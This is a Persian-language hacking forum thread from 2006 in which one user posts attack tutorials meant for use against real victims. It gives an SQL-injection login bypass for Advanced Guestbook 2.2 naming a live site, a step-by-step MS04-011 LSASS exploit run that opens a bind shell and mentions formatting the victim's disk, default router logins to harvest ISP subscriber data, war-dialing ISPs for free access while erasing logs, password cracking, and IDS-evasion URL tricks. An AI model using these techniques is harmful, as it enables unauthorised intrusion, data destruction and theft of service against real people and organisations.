11-09-2006, 23:44
مرسی من این تاپیک رو ندیده بودم به نظر کامل میاد ...
راستی کدهارو هم یادتون رفته

pastoo
11-09-2006, 23:59
مرسی من این تاپیک رو ندیده بودم به نظر کامل میاد ...
راستی کدهارو هم یادتون رفته


کدها گذاشته شد

موفق باشید

mirvis
12-09-2006, 00:03
وست عزیز آقای پستو لطفا واضح تر توزیح بدید از پست اخر شما تا حدودی انجام دادم ولی کاما توزیع ندادی

pastoo
12-09-2006, 00:34
وست عزیز آقای پستو لطفا واضح تر توزیح بدید از پست اخر شما تا حدودی انجام دادم ولی کاما توزیع ندادی


دوست من توجه کن که سایت باید آن باگ را شامل باشد تا قابل هک باشد

شما برای اجرای این کد ها ابتدا دانلود کن . Notepad رو باز کنید کد رو داخلش بنویسید و از منویه File گزینه Save As.. رو انتخاب کنید و هر کجا که میخواین با نام دلخواه تون Save کنید البته بعد از اینکه نام فایل رو نوشتید پسوند اونو .HTML بزارید.
بعد فایلتونو داخل Notepad باز کنید و به جای [sitename] آدرس سایتی رو که میخواین هک کنین رو بنویسید.

کد اول: با استفاده از این میتونین داخل سایت یه کاربر با امکانات ادمین سایت ایجاد کنید و سپس
وارد سیستم مدیریت سایت بشید و سایت رو هک کنید.

pastoo
12-09-2006, 09:40
هک کردن سایت ها
سلام
امروز با یک باگ اومدم که تو سط اون می تونید سایت هایی را که از Advanced Guestbook 2.2
استفاده می کنن را به راحتی هک کنید
سایتی که توسط من برای تست هک شد http://www.latinchoir.com/forum/ (http://www.latinchoir.com/forum/)
مرحله اول : در گوگل جستجو کنید Advanced Guestbook 2.2 Powered by وقتی پیدا کردید که به قسمت ادمین سایت بروید و به جای نام کاربری بنویسید : ' or 1=1 /*
و جای کلمه عبور را خالی بگذارید سپس به قسمت ادمین وارد می شوید و به قسمت AdminEasy (http://www.latinchoir.com/forum/admin.php?action=show&tbl=gb&session=854a581a616f29f1ae4263537c04d8b2&uid=1) بروید و تغییرات را اعمال کنید
ضمنا هکرهای ترکیه ای خیلی از این سایت ها را با همین روش هک کرده اند که برای پیداکردن این سایت های هک نشده به صفحه 12 به بعد جستجو گوگل بروید

pastoo
12-09-2006, 09:52
اول از همه چیز بگم که مخالف 100% هک کلاینت هستم ولی چون مطلب حرفه ایی است مجبورم بگم .................

مطلبي كه در اينجا ميخوانيد يكمي پيچيده است بنابراين اصلا نگران نباشيد گام به گام با اين متن پيش برويد سعي ميكنم خيلي ساده عنوان كنم اصلا نگران نباشيد
خلاصه كاري كه ما ميكنيم اين است كه ما با كارهاي زير ميخواهيم به ويندوز 2000 يا ايكس پي حمله كنيم از بيرون دستگاه بدون اينكه به قرباني فايلي بديم اجرا كنه يا هر ارتباط ديگري با قرباني داشته باشيم يعني ميخوايم خيلي حرفه اي نه مثل اين هكر هاي تازه كار كه تروجان ميدن به مردم خيلي حرفه اي خودمان ميخوايم يك پورت روي دستگاه قرباني باز كنيم بدون اينكه حتي يك كلمه هم با قرباني حرف بزنيم خوب حالا كه فهميديد چيكار ميخوام بكنيم من يكبار ديگه هم خلاصه بگم يك اي پي انتخاب ميكنيد و بعد هكش ميكنيد اولين كاري كه ميكنيم اين است كه اي پي مورد نظر يا همان قرباني را براي باز بودن پورت 445 امتحان ميكنيم
Start->run->CMD
را براي باز كردن يك صفحه كامند پرومت بزنيد و بعد با دستور
telnet ip 445
امتحان ميكنيم كه ايا پورت 445 باز است يا نه البته شما اگر حرفه اي هستيد حتما مثل هكر هاي حرفه اي براي اين كارها يك برنامه خاص را استفاده ميكني بنا به سليقه خودتان كه از چه برنامه اي خوشتان مياد ولي در اينجا از دستوراتي استفاده ميكنيم كه هر كسي خواست اين كار را انجام بدهد نياز به برنامه خاصي نداشته باشه و با كمترين امكانات ميخوايم به نتيجه برسيم
خوب توجه كنيد به جا اي پي در دستور بالا بايد اي پي قرباني را وارد كنيد و اگر اين دستور را وارد كرديد و اتصال برقرار شد يعني پورت 445 باز است پس گام اول را برداشتيد و اگر اتصال برقرار نشد و پيغام خطا دريافت كرديد قرباني شما به اين نوع حمله نفوذ پذير نيست
خوب حالا به گام دوم ميرويم در زير كد هاي حمله به اين پورت را مشاهده ميكنيد اين كدها را بايد كامپايل بفرمائيد و فايل اجرايي كه بدست مي اوريد را بصورت زير استفاده ميكنيد


expl <target> <victim IP> <bindport> [options]


در خط بالا طرز استفاده به اين ترتيب است اولين كلمه expl نام فايل اجرايي است كه بعد از كامپايل ايجاد كرديد target يك عدد يك رقمي است كه مقدار 0 براي ويندوز ايكس پي است و مقدار 1و2 براي ويندوز 2000 است در اخر اين نوشته طرز تشخيص اينكه كدام عدد را استفاده كنيد يعني از كجا بفهميد قرباني ويندوز ايكس پي است كه 0 بزنيد يا قرباني ويندوز 2000 است كه 1 يا 2 بزنيد را ميخوانيد
victim ip همان اي پي قرباني شما است كه پورت 445 ان باز بود
binport شماره پورتي است كه ميخواهيد روي دستگاه قرباني براي شما باز بشود و به ان پورت وصل بشويد و قرباني را هك كنيد
option يك دستور است كه در ادامه تك دستور اين برنامه را توضيح ميدهم

خوب دوست من كار بسيار ساده است فرض كنيد اي پي قرباني من 217.0.0.1 است و من طبق ان چيزهايي كه بالا گفتم اين كارهاي را به تريتب انجام ميدهدم
1- Start --> Run --> CMD
2- Telnet 217.0.0.1 445
3- اگر وصل شد از برنامه حمله كه قبلا كامپال كردم و الان اماده استفاده است استفاده ميكنم
4- پنجره قبلي را كه در 2 دستور قبل باز كردم ميبندم
5- Start->Run->CMD
6-expl.exe 0 217.0.0.1 24745
----بعد از اينكه دستور خط 6 را زدنيد اين نوشته ها را مشاهده ميكنيد----
*
Target: IP: 217.0.0.1: OS: winXP [universal] lsass.exe
*
Connecting to 217.0.0.1:445 ... OK
*
Attacking ... OK
7-حمله انجام شد و پورت مورد نظر شما كه در خط شماره 6 من شماره پورت 24745 را انتخاب كردم الان باز شده تا ما وارد دستگاه قرباني بشويم
8-Start-->Run-->CMD
9-telnet 217.0.0.1 24745
10-به احتمال 95 درصد شما موفق شديد دستگاه قرباني را هك كنيد و اين خطوط را مشاهده خواهيد كرد
* Microsoft Windows XP [Version 5.00.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\WINNT\system32>
11- دوست من در اين جا شما هر دستوري بزنيد روي دستگاه قرباني اجرا ميشود مثل اگر بزنيد format C: مي توانيد هارد قرباني را فرمت كنيد
ولي توجه كنيد يك هكر در اوج قدرت دست به خرابكاري نميزنه !!! پس هر كاري خواستيد بكنيد ولي خرابكاري نه !!!

و اما چطوري تشخيص بدهيد كه دستگاه قرباني شما ويندوز 2000 است كه از عدد 1 يا 2 استفاده كنيد يا ويندوز ايكس پي هست كه از عدد0 استفاده كنيد ؟ شما كافي است كه همان دستور بالا را كه براي حمله استفاده مكنيد بزنيد و فقط به اخرش -t اضافه كنيد يعني اينطوري
expl 0 217.0.0.1 24745 -t
بعد از زدن اين دستور برنامه به شما نسخه ويندوز را اعلام ميكند اگر نسخه ويندوز را winnt 5.0اعلام كرد يعني ويندوز 2000 است و شما عدد 1 يا 2 استفاده كنيد و اگر winnt 5.1 را اعلام كرد ويندوز ايكس پي است


اميدوارم كه مطلب بالا مورد استفاده شما قرار گرفته باشد توجه كنيد براي اينكه همه بتوانند اين مطلب را استفاده كنند مجبور شدم كه خيلي جاها را ساده كنم ولي در سورس اصلي برنامه ميتوانيد به اصل دستور عمل ها پی ببريد .

برای دريافت کد برنامه به زبان سی اينجا کليک کنيد

ادرس : http://downloads.securityfocus.com/vulnerabilities/exploits/HOD-ms04011 (http://downloads.securityfocus.com/vulnerabilities/exploits/HOD-ms04011-lsasrv-expl.c)

pastoo
12-09-2006, 09:54
قصد دارم دربارهء استفاده از يک برنامه بسيار مهم اما در عين حال سادهء ويندوز برايتان بنويسم . در کليهء ويندوزها شما برنامه ای تحت عنوان هايپرترمينان را می شناسيد . درست حدس زديد . برنامهء مذکور يکی از ابزار مهم هک اينترنتی بحساب می آيد . علاوه بر کاربری که برای ارتباط بين دو کامپيوتر دارد برنامهء مذکور می تواند ابزاری برای هک ISP ها باشد .
اولين قدم : برای هک يک شرکت ISP شما ابتدا بايد يک ID داشته باشيد که می تواند کارت اينترنت باشد . ابتدا بايد توسط هايرترمينان شماره تلفن شرکت را نوشته تا وصل شود . بعد از اتمام اتصال (بستگی به ISP آن شرکت دارد) از شما اسم رمز و پسورد می خواهد .
Welcome To The Router
Username : system
Password : ROUTER
با وارد نمودن اطلاعات مورد نظر شما وارد سيستم می شويد که می توانيد با صادر نمودن فرمانهای مختلف مانند سيستم عامل داس از روتر مورد نظر اطلاعات ارزشمندی بدست آوريد از جمله کليهء اطلاعات کارت اينترنت يا اشتراک ها
ROUTER > systat
...
10 tty 10 5ab102676 Async interface 00:00:00 PPP: 217.219.137.89
12 tty 12 acc110549 Async interface 00:00:03 PPP: 217.219.137.64
13 tty 13 s5c112320 Async interface 00:00:06 PPP: 217.219.137.90
14 tty 14 a3ac107287 Async interface 00:00:00 PPP: 217.219.137.61

pastoo
12-09-2006, 23:32
5 ساله پیش راهی برای ورود به ISP های مختلف پیدا کردم و مورد حمله قرار دادم 1 کیشو در مطلب پیش عنوان کردم و این 1 کی هم الان توضیح میدم

ما برای این کار به یک برنامه به نام THC-Scan 2.0 احتیاج داریم که می توانید آن را از:
www.thc.infreno.tusculum.edu (http://www.thc.infreno.tusculum.edu/)

دریافت کنید همچنین باید به سایت Network Solution (http://www.networksolution.com/) رفته و در بالای صفحه به دنبال گزینه ی Who is بگردید و بعد از پیدا کردن آن بر روی لینک آن کلیک کنید و در بخش Domain یا در قسمت Site Name اسم سایت مورد نظر را خود را که همان سایت ای اس پی مورد نظر خود است را بنویسید و سپس Search کرده و در صفحه ی باز شده شماره تلفن هایی را که نمایش داده است را یادداشت کرده و به کمک نرم افزار THC-Scan 2.0 ای اس پی خود را مورد پویش قرار دهید

اگر به این شکل نتوانستید شماره تلفنی پیدا کنید می توانید به 118 تلفن کرده و از آن شماره های اداری ای اس پی خود را بگیرید و یادتان باشد که این شماره با شمار های اتصال به شبکه فرق می کند
حالا چگونه می توانیم با نرم افزار فوق این کار را کنیم؟

بعد از اجرا کردن برنامه شماره تلفن را به آن داده و آن شروع به سرچ می کند و پس از اتمام سرچ دوباره شماره تلفن هایی را به شما می دهد که این شماره ها همان شماره هایی هستند که می توانید با زنگ زدن به آن ها((که آموزشش را الان می دهم))به صورت رایگان به اینترنت وصل شده و یا رایگان به جایی زنگ بزنید

1.برای تلفن به خارج یا تلفن زدن رایگان به وسیله ی آن شماره تلفن ها این کارها را انجام دهید:

با تلفن معمولی یا به وسیله ی Hyper Terminal در قسمت Start-->All Programs-->Accessories-->Communication-->Hyper Terminal به آن شماره ها زنگ زده و به صورت رایگان به هر جایی تلفن بزنید

2.برای وصل شدن به اینترنت به صورت رایگان این کارها را انجام دهید:

در بخش Connection و یا همان صفحه ای که به روش Dial-up به اینترنت وصل می شوید دو قسمت Username و password را خالی گذاشته و شماره ی پیدا شده را در قسمت Dial بنویسید و بعد به صورت رایگان به اینترنت وصل شوید
دوستان عزیز یادتان باشد حتما قبل از شروع این کار اطلاعات کاملی در مورد نحوه ی حفاطت امنیت آی اس پی مورد نظر خود پیدا کنید چون اگر محافظت از ای اس پی بالا باشد و شما هم مثلا به طور شانسی توانستید این کار را بکنید هنگامی که شما به آن شماره ها زنگ می زنید شماره ی شما در حافظه ی آن ای اس پی ثبت می شود و اگر آن ها شماره ی شما را پیدا کنند به راحتی می توانند علیه شما شکایت کنند البته گفتم اگر حفاظت از آن ای اس پی پایین بود می توانید یک دور کامل به ای اس پی نفوذ کرده و شماره ی خود را از حافظه ی آن پاک کنید و اگر حرفه ای هستید این کار را بکنبد و گرنه هر مشکلی که برایتان پیش آمد من هیچ مسولیتی ندارم.

pastoo
13-09-2006, 19:40
آموزش کامپایل اکسپلویت به زبان سی

و در این کلیپ آموزش کامپایل اکسپلویت به زبان سی
برنامه های لازم:
کامپایلر C++ C
توصیه میشه Microsoft Visual C++ 6.0
Download (http://www.satanichell.com/Journal/compile%20exploit%20c.rar)
فيلم آموزش کامپايل کردن اکسپلويت به زبان پرل

برنامه های مورد نیاز:
اکتیو پرل Active Perl
با توجه به پلت فورم که دارید اکتیو پرل رو دانلود کنید(اگر لینوکس هستید لینوکس اگر ویندوز هستید ویندوز)
از سایت زیر میتونید دانلود کنید(اول سیستم عامل تون رو مشخص کنید بد اکتیو پرل رو دانلود کنید) : http://downloads.activestate.com/ActivePerl/ (http://downloads.activestate.com/ActivePerl/)
من از این نسخه استفاده میکنم : ActivePerl-5.6.1.638-MSWin32-x86
Download Clip (http://satanic.persiangig.com/video/perl.rar)

pastoo
13-09-2006, 23:48
گاهی هکرها در هنگام نوشتن به جای تعدادی از حروف انگليسی معادل‌های قراردادی به کار می‌روند که ليست آنها را در زير می‌بينيد:
0 <= O
1 <= L; I
2 <= Z
3 <= E
4 <= A
5 <= S
6 <= G
7 <= T
8 <= B
| <= L; I
@ <= at (duh)
$ <= S
)( <= H
}{ <= H
/\/ <= N
\/\/ <= W
/\/\ <= M
|> <= P; D
|< <= K
ph <= f
z <= s


مثلا he Speaks می‌شود:
}{3 $|>34|< z
توصيه من اينه که از اين معادل‌ها تا جايی که می‌تونيد استفاده نکنيد. فقط ياد بگيريد که کم نياريد.

pastoo
14-09-2006, 00:00
سرور کجاست


جديدترين برنامه هاي جاسوسي که به طور کاملا قانوني به بازار عرضه شده برنامه NEO TRACE PRO است.


بعد از نصب برنامه شهر و کشور محل اقامت شما رو ازتون ميپرسه و آي پي آدرس شما و کشور شهر محل اقامت ما به عنوان مبدا در نظر گرفته ميشه . حال سوال اينه که برنامه چيکار ميکنه؟


به برنامه يک آدرس آي پي يا يک سايت اينترنتي مثل ياهو دات کام داده ميشه و تنها کاري که کاربر ميکنه بعد از اين کليک کردن روي GO است از اين لحظه برنامه شروع ميکنه به رد يابي سرور از کامپيوتر شما تا کامپيتر سرور. و اون هم به صورت گرافيکي روي کره زمين.يعني شما دقيقا ميبينيد که از چه طريقي به سرور وصل هستين؟


مثلا سرور ياهو در جايي نزديک سنت خوزه در اسيا هست و .... بعد از پيداشدن سرور توسط برنامه تازه کار اصلي و جالب توجه شروع ميشه و اون اينه که برنامه تمام مشخصات فردي رو که سروربه اسم اون ثبت شده رو از تلفن تا آدرس خونه و آدرس ميل و...نشون ميده .


بهترين کار و جالب توجه ترين کاري که برنامه ميکنه در مورد سرورهاي معروفه که برنامه يک عکس ماهواره اي از ساختموني که سرور روي اون هست نشون ميده.بقيه چيزهاروهم مثل آدرس سرور و نشون دادن اون به صورت دقيقروي نقشه شهري و... رو ميذارو به عهده خود شما.


برنامه رو از اينجا ميتونين داون لود کنين. (http://www.5star-shareware.com/Internet/InternetTools/neotrace-download.html)

pastoo
14-09-2006, 00:06
لازم به تذکرکه معتبرتن سایتهای دنیا ازسیستم عامل یونیکس
استفاده می کنند
دریونیکس Password کاربران درشاخه ETC ذخیره می شود
وهرچه نسخه یونیکس قدیمی تر باشد Password ان در فایل
ETC Password ذخیره می شود
ودرنسخه های جدید زیرشاخه ای در فایل ETC Password در
نظرگرفته شده است اطلاعات عموی کاربر در ان ذخیره می شود
ولی Password کاربردر ان ذخیره نمی شود
___________________________________

معرفی ابزار
JOHN
پیش اگهی:برای تنظم JOHN باید درFTP سایت مورد نظردر فایلهای
سرویس دهنده ان اخلال کرد تا بوسیله فایل MEMORY DUMP
ابزارJOHN تنظم شود
برای درک صحیح به این سایتFTP (ftp://ftp.openwall.com/pub/projects/john/contrib/) مراجعه کنید
درسیستم عامل یونیکس ابزارJOHN به این شکل Password
کاربررا می شکستند که با استفاده ازفایلی به نامMEMORY DUMP
که این فایل بشکلی عمل می کند وقتی یک پروسه از کار بی بیفتد این
فایل فضای حافظه را دراختیار پروسه قرار می دهد تا از نو ان پروسه
بازسای و رفع اشکال کند حال اگر پروسه برای بازسای ازاین فایل
استفاده کند واز ان Password کاربر را استخراج کند
شما با استفاده از این اطلاعات واخلال در سرویس دهنده FTP کاربر
یونیکس و داشتن فایل Password با ابزارJOHN می توانید به
جستجوPassword کاربرسیستم عامل یونیکس رفته
John the Ripper 1.6 (Unix (http://www.openwall.com/john/john-1.6.tar.gz)
John the Ripper 1.6 (DOS (http://www.openwall.com/john/john-16d.zip)John the Ripper 1.6 (Win32 (http://www.openwall.com/john/john-16w.zip)

pastoo
14-09-2006, 00:14
استفاده از این ابزار مشمعول shareware است
شما با اين ابزار توان شناساي نقاط اسيب پذيردر network را داريد
ابزارFireWalk به شکلي در network هدف عمل ميکند که پورت هاي بازماده فيلترديوار را تعين مي کند واين جستجودر network به چند بخش تقسيم مي شود
1-تعداي بسته را بسوي هدف ارسال مي کند
2-فيلد TTL را تنطم مي کند ...{TTL=1}-{TTL=2}-{TTL=3}
3-سپس مسيريابي بين ابزارو ديوار هدف را انحام مي دهد
4-اين مکانيزم براي شماره پورت مختلف تکرار مي کند
5-ارسال داده هاي نا متعارف بهnetwork هدف
6-اعلان پورت هاي بازماده

شما براي گرفتن اين ابزار FireWalk اينجا (http://www.creamware.de/Files/firewalk.zip)

zuul:#firewalk -n -P1-8 –pTCP 10.0.0.5
Firewalking through 10.0.0.5 (towards with a maximum of 25 hops.
Ramping up hopcounts to binding host...
probe: 1 TTL: 1 port 33434: [10.0.0.1]
probe: 2 TTL: 2 port 33434: [10.0.0.2]
probe: 3 TTL: 3 port 33434: [10.0.0.3]
probe: 4 TTL: 4 port 33434: [10.0.0.4]
probe: 5 TTL: 5 port 33434: Bound scan: 5 hops [10.0.0.5]
port 1: open
port 2: open
port 3: open
port 4: open
port 5: open
port 6: open
port 7: *
port 8: open
packets sent, 12 replies received

pastoo
14-09-2006, 00:17
استاندار CGI مخفف Common Gateway Interface است
CGI براي پردازش و تجزيه و تحليل اطلاعات ای که از سوي کاربر ارسال شده به کار مي رود وتوان ارتباط بين Server ساير برنامه ها را مشخص شده درسرور را دارا می باشد
اسکريپتهاي CGI عليرغم توان تشان مسیربرنامه ها را کند مي کنند چرا که براي اجراي يک اسکريپت CGI مراحل زيادي بايد انجام شود وعلت این امر به ان جهت است که اول - اطلاعات بايد دو بار بين مرورگر وServer منتقل شوند دوم - سرور بايد مدتي را صرف پردازش اطلاعات ارسالی از مرورگر نمايد سوم - اجراي يکCGI به مانند درخواست يک صفحه جديد است با اين تفاوت که زماني نيز بايد صرف اجراي آن CGI بر روي سرور شود
چرا که شما با ارسال يک فرم يا کليک کردن روي يک ابر پيوند درخواستي را براي اجراي يک CGI به سويServer ارسال ميکند

شما در مرحله پويش و جستجوي سيستم توان پيدا كردن اسكريپتهاي ناقص
وضعيف نوشته شده برخي از برنامه هاي CGI دارید که به قدري ضعيف نوشته شداند كه بدون هيچ پردازشي داده هاي ارسالي از صفحه وب هدف را مستقيم روي سرويس دهنده اصلي اجرا مي كنند مثلا يك اسكريپ CGIرا در نظربه گيريد كه يك فرمان پرس وجو Query را ازبانک اطلاعا ت هدف گرفته و آنرا مستقيما به S QLserverمي فرستد
مكانيزم هاي نفوذ
شمااز طريق برنامه نويسي با پورت80 از سرويس دهنده ارتباط برقرار ميكند وتقاضاي راه اندازي يك اسكريپ را با متودGET
یعنی بصورت مصنوعي FTP توليد و به سرويس دهنده مي فرستد.اسكريپتهاي CGI ضعيف هر چه كه ارسال شده باشد بافرض أنكه از صفحه وب و از طريق فرم أمده اجرا ميكنند  .
بنابر اين شما با يافتن همين نقاط ضعف در اسكريپتهاست .

براي جستجوي اسكريپتهاي أسيب پذير .ابزارهاي زیادی وجود دارد که قبلا چند
تای انها را معرفی کرده ام
شما به غير از جستجوي آسيب پذيري سعي كنید سيستم IDS هدف را گول بزنید
شما برای این امر می توانید از ابزار whisker استفاده کنید
توان whisker در بررسي نقاط ضعف اسكريپهاي در سطح لايه وسطح TCP/IP را مي شناسد و انها را ازمايش مي كند W hisker نقاط ضعف بيش از 500 نوع اسكريپ CGI وASP را پیدا می کند و قادر است با سرويس دهنده هاي وب مجازيVitual Webserver كه بر روي يك ماشين واحد اجرا مي شوند، ارتباط برقرار كند در ضمن روشي براي حدس User IDو كلمه عبور كه در هنگام احراز هويت (Web Authentication )در خواست مي شود،پياده سازي كرده
این روش ها به شرح زیر
URLencoding:
آدرس در URLارسالي با كدهاي معمولي ASCIIارسال نمی کند
اول هر كاركتر با معادل يوني كدآن با قالب % xxتعريف شده در MIME می گذارد و سپس ارسال می کند برخي از سيستمهاي IDS نمی توانند چنين قالبي را تشخيص دهند
GET /%63%67%69%2d%62%69%6e/broken .cgi HTTP/ 1.0
استاندارد MIME، براي معادلسازي كاركترها در رشته URLابتدا كاركتر% و سپس كد هگزاسيمال عدد قرار مي گيرد.
%63 c.%67 g .%69 i.%2d - .%62 b .%69 I .%6e
%63567569%2d%6956e CGI-bin
Directory inrertion/./: URL
كاراكترهاي/./ارسالي از طرف شما در برخي از سرويس دهنده هاي وب به اين شكل تفسير مي می کند یعنی به شاخه جاري تغيير مسير بدهيد تغيير مسير به شاخه جاري هيچ مشگلی ندارد وURLرا بشكل اي عوض مي کند و به الگوي حمله شباهت ندارد و IDS آنرا مجاز خیال کند
GET /. /cgi -bin /./broken. Cgi HTTP /1.0
peremator URL Ending
درURLارسالي اطلاعاتي در خصوص اسكريپت مورد نظر قرار داده نمي شود در عوض اين اطلاعات در بخش سر ايند HTTPجاسازي مي شوند

GET /HTTP /1.0 /r/ Nheader: …/../cgi -bin /broken. Cgi /HTTP/ 1.0

LONGURL
شاخه است كه وجود نداردURL ارسالي شامل نام بسيار طولاني يك شاخه است درانتها كاركترهاي /../قرار مي گيرد سرويس دهنده وب از نام شاخه چشم پوشي مي شود IDSفقط بخش اول از أدرسURLرا برسي مي كنند واین تقاضاي خطر به نظرش مي رسد
Cgi -bin /bvroken .cgi HTTP/1.0 / .. GET / this isbunnchofjunktomaketh URL long/

Fake parameter:url
پارامترهائي هستند كه هيچ خاصيت يا زیانی ندارد فقط URL رابه شكل عوض مي کتد IDS أنرا خطر بداند
GET / index. Html param=/../cgi-bin/broken .cgi HTTP /1.0

TABsseparetion
كاركتر فاصله خالي spaceجدا می کند وبخشهاي مختلف URL ارسالي بجاي آن با كاركتر TAB عمل کند URL به شكل اي عوض مي كند تا به الگوي حمله شبا هت نداشته باشد و IDS أنرا بی خطر بداند
GET /bin broken /broken .cgi HTTP/1.0
Case senistiivity
سيستم هاي هستند که IDSانتظارURL با حرف كوچك دارند ولي تعدادي هم هستند که از سرويس دهنده هاي وب ارسال URL با حروف بزرگ و كوچك برای ان فرق نمي كنند و قابل اجراست بدينشكل IDS
گول مي خورد و تقاضارا اجرا مي کند

Windows delimiter
در ويندوز استفاده از علامت \بجاي /مجاز مي شناسد ودر بعضی از سيستم هاي IDS به أن حساسيت ندارند و در مورد شكل URLگمراهش مي کند
GET/ CGI-BIN/broken .cgi HTTP /1.0
Session Splicing روش این مكانيزم Session Splicing در سطح لايه TCP پياده سازي شده وابتدا قطعه قطعه شده و در بسته هاي يك تا سه كاركتري ارسال مي شود IDS ،توان بازسازي قطعات را ندارند و مجبور می شود براي اين بسته ها اجازه صادركند
G
ET
/GET/ cgi-bin /broken .cgi HTTP /1.0
i-
bin
/br

NULL Method
IDS براي تحليل رشته URL از توابع رشته اي استفاده مي كنند. در بين رشته URL، كاركتر%00(NULL Character) وجود داشته باشد توابع رشته اي آنرا بعنوان خاتمه رشته تلقي مي كنند وبدين الگو IDS گول مي خورد
GET%00/ cgi-bin /broken .cgi HTTP /1.0

pastoo
14-09-2006, 00:26
يكي از روشهايي پويش و جستجوي سيستم يافتن اسكريپتهاي ناقص وضعيف است
برخي از برنامه هاي CGIبه قدري ضعيف نوشته شده اند كه بدون هيچ پردازشي داده هاي ارسالي از صفحه وب سايت کاربر را مستقيما روي سروراصلي اجرا مي شود
مثال اول _ يك اسكريپ CGI كه يك فرمان پرس وجو Queryرا از صفحه وب کاربر گرفته و آن را يک راست به SQLserverمي فرستد در حقيعت اين يک روش عادي بطور معمول است اسكريپ را از طريق صفحه وب راه اندازي مي كنند ولي اگر کاربرنفوذگر باشد نه از طريق صفحه وب بلكه از طريق برنامه نويسي با پورت80 از server ارتباط برقرار مي كند وتقاضاي راه اندازي يك اسكريپ را با متود GET مي کند به شکل مصنوعي توليد و به server ارسال مي کند واسكريپتهاي CGI ضعيف و خر هر چه كه ارسال شده باشد بافرض أنكه از صفحه وب و از طريق فرم أمده اجرا مي كنند
بنابر اين يكي از اهداف شما پيدا کردن همين نقاط ضعف در اسكريپتهاست براي جستجوي اسكريپتهاي أسيب پذير ابزارهاي متنوعي وجود دارد كه يکي از بهترين ها اين ابزار ها whisker است
زيرا به غير از جستجوي سعي مي كند سيستم IDS را نيز گول بزند
Whisker مبتني بر Perl بوده وروي تمام محيطهائي كه زبان Perlرا پشتيباني مي كنند قابل اجراست در بررسي نقاط ضعف اسكريپهاي CGIامكاناتي در نظر گرفته شده در سطح TCP/IP قدرتمند است و در سطح لايه كاربرد و وب
Whisker ضعف بيش از 600 نوع اسكريپ CGI وASP را مي خواند و انها را امتحان مي كند و قادر است با server مجازيVitual Webserver كه بر روي يك ماشين واحد اعمال مي شوند ارتباط برقرار كند در ضمن روشي براي حدس User ID و كلمه عبور كه در هنگام احراز هويت Web Authentication در خواست مي شود،پياده سازي كرده است
بزرگترين ويژگي whiskerآن است كه براي پويش وجستجوي نقاط ضعف اسكريپهايGGIاز روشهاي خاصي استفاده مي كند تا سيستمIDSوبweb IDS را گول بزند

IDS اجراي اسكريپت broken.cgi در ابزلر whisker و در سيستم ها مختلف

زماني که شما تقاضاي مبتني بر متودGET توسط سيستم IDS دريافت مي شود IDS كشف مي كند كه سعي در اجراي اسكريپت broken.cgiاز شاخه/bin/cgi است .GET /cgi-bin /broken.cgi HTTP/1.0
بدين ترتيب مانع اجراي اسكريپت مربوطه خواهد شد ولي در
whisker روش متنوع و قدرتمند براي گول زدن IDS بكار مي گيرد كه در اين روشها در زير معرفي شده درتمام اين روشها منظور از تقاضا ارسال يك فرمان HTTP به سرويس دهنده وب براي فعل وانفعال با برنامهCGI تلقي شده است
URLencoding:قسمت آدرس در URLارسالي با كدهاي معمولي ASCIIارسال نمي شود
بلكه ابتدا هر كاركتر با معادل يوني كدآن يعني با قالب % xxتعريف شده در MIME جايگزين و سپس ارسال مي شود.برخي از سيستمهاي IDS قادر نيستند چنين قالبي را تشخيص به دهند و لذا تقاضاي شما كشف نخواهدشد
GET /%63%67%69%2d%62%69%6e/broken .cgi HTTP/ 1.0
نكته:طبق استاندارد MIME براي معادل سازي كاركترها در رشته URLابتدا كاركتر% و سپس كد هگزاسيمال عدد قرار مي گيرد.
%63 c.%67 g .%69 i.%2d - .%62 b .%69 I .%6e n
%63567569%2d%6956e CGI-bin Directory inrertion/./: URLارسالي شما كاراكترهاي/./است كه در برخي از سرور دهنده هاي وب به اين شكل تعبير وتفسير مي شود يعني شما ان را به شاخه ديگر تغيير مسير مي دهيد تغيير مسير به شاخه جاري هيچ خاصيت يا ضرري ندارد بلكه فقط شكل URLرا بگونه اي تغيير مي دهد تا روش شما بايد بگونه اي باشد که به الگوي حمله شباهت نداشته باشد و IDS آنرا مجاز بداند
GET /. /cgi –bin /./broken. Cgi HTTP /1.0

peremator URL Ending:درURLارسالي اطلاعاتي در خصوص اسكريپت مورد نظر قرار داده نمي شود و در عوض اين اطلاعات در بخش سر ايند HTTPجاسازي مي شود به مثل زير دقت کنيد
GET /HTTP /1.0 /r/ Nheader: …/../cgi –bin /broken. Cgi /HTTP/ 1.0
اگر شما با پروتكلHTTPآشنا باشيد صحت URL فوق واعتبار تقاضاي GETراتائيد مي كنيد و در حقيغت همين شکل است
LONGURL : أدرس درURL ارسالي شامل نام بسيار طولاني يك شاخه است كه اصل وجود ندارد در انتها اين نام كاركترهاي /../قرار مي گيرد بدين ترتيب در سرور از نام شاخه چشم پوشي مي کند
بعضي از سيستمهاي IDSفقط بخش اول از ادرسURLرا برسي مي كنند وتقاضاي شما صحيح خوانده خواهد شد
Cgi –bin /bvroken .cgi HTTP/1.0 / .. GET / this isbunnchofjunktomaketh URL long/
Fake parameter:url ارسالي شما شامل پارامترهائي است كه هيچ خاصيت يا ضرري ندارد فقط شكل URL رابگونهاي تغيير مي دهد تا به الگوي حمله شبيه نباشد وIDS أنرا مجاز بداند
GET / index. Html param=/../cgi-bin/broken .cgi HTTP /1.0
TABsseparetion بخشهاي مختلف URL ارسالي بجاي آنكه با كاركتر فاصله خالي (space)جدا شده باشد با كاركتر جدا مي شوند در اين حالت شكل URL بگونه اي تغيير مي كند تا به الگوي حمله شبا هت نداشته باشد و IDS أنرا مجاز بداند برخي از سيستمهاي IDS به اين نحوه گمراه شده وبه اين تقاضا اجازه اجرا مي دهند و برخي ديگرأنرا حذف مي كنند
GET /bin broken /broken .cgi HTTP/1.0
Case senistiivity: برخي از سيستمهاي IDSانتظارURL با حروف كوچك انگليسي دارند وليكن در تعدادي از سرور هاي وب مثل IIS در ويندوز ارسال URL با حروف بزرگ و كوچك فرق نمي كنند و قابل اجراست و بدين ترتيب سيستم IDS را براحتي فريب مي هيد و تقاضاي ارسالي شما اجرا مي شود
GET/ CGI-BIN/broken .cgi HTTP /1.0
Windows delimiter در سيستم عامل ويندوز استفاده از علامت بجاي (جدا كننده شاخه)مجاز شمرده مي شود در حاليكه برخي از سيستمهاي IDS به أن حساسيت ندارند لذا در مورد شكل URLگمراه مي شوند .مثال:
GET /cgi –bin/ broken .cgi HTTP /1.0
